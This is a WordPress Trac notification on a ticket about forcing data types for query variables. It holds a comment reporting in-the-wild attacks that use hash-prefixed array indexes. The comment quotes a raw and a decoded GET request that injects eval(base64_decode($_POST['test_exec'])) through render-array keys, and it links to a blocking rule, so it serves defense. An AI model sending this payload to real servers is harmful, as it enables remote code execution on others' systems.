[wp-trac] [WordPress Trac] #17737: Be better at forcing data types for query vars
WordPress Trac
noreply at wordpress.org
Tue Sep 25 08:54:22 UTC 2018
#17737: Be better at forcing data types for query vars
---------------------------------+-----------------------------
Reporter: juliobox | Owner: SergeyBiryukov
Type: defect (bug) | Status: reviewing
Priority: normal | Milestone: 5.0
Component: Query | Version: 3.0
Severity: normal | Resolution:
Keywords: has-patch 3.9-early | Focuses:
---------------------------------+-----------------------------
Comment (by szepe.viktor):
There are attacks containing a hash sign as the first character of the
query variable array index.
{{{
GET
/?name%5B%23post_render%5D%5B0%5D=array_map&name%5B%23suffix%5D=eval%28base64_decode%28%24_POST%5B%27test_exec%27%5D%29%29%3B%2F%2F&name%5B%23markup%5D=assert&name%5B%23type%5D=markup
HTTP/1.1
}}}
Decoded:
{{{
/?name[#post_render][0]=array_map&name[#suffix]=eval(base64_decode($_POST['test_exec']));//&name[#markup]=assert&name[#type]=markup
}}}
Protection is implemented: https://github.com/szepeviktor/wordpress-
fail2ban/blob/master/block-bad-requests/wp-fail2ban-bad-request-
instant.inc.php#L396-L402
--
Ticket URL: <https://core.trac.wordpress.org/ticket/17737#comment:33>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
More information about the wp-trac
mailing list